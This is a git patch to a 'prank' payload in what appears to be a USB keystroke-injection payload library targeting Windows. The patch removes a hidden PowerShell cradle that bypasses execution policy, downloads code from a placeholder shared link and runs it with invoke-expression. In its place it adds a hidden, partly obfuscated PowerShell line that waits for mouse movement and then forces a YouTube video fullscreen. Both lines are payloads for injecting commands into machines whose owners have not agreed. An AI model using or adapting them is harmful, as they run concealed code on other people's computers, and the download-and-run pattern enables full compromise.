From 8e78d2783fe0271a1adbabb82f35c4072b1824ca Mon Sep 17 00:00:00 2001 From: "DIYS.py" <110927141+DIYSpy@users.noreply.github.com> Date: Wed, 21 Aug 2024 13:14:09 -0400 Subject: [PATCH] Update YouTube-TripWire.txt Added the correct code to execute the functionality of this prank, as per the example found within the ReadMe file. --- payloads/library/prank/-RD-YT-Tripwire/YouTube-TripWire.txt | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/payloads/library/prank/-RD-YT-Tripwire/YouTube-TripWire.txt b/payloads/library/prank/-RD-YT-Tripwire/YouTube-TripWire.txt index 0c807e9..3a42c2d 100644 --- a/payloads/library/prank/-RD-YT-Tripwire/YouTube-TripWire.txt +++ b/payloads/library/prank/-RD-YT-Tripwire/YouTube-TripWire.txt @@ -8,8 +8,7 @@ REM Target: Windows 10, 11 GUI r DELAY 500 -STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl +STRING powershell -w h Add-Type -AssemblyName *m.W*s.F*s;$w=[Windows.Forms.Cursor];$p=$w::Position.X;while(1){if($w::Position.X-ne$p){break}else{Sleep 3}};saps https://youtu.be/sOLIdqpzrW4;sleep 3;$o=New-Object -ComObject WScript.Shell;$o.SendKeys('f') ENTER -REM Remember to replace the link with your DropBox shared link for the intended file to download -REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly +REM Remember to replace the link with the YouTube URL of the video you intend to play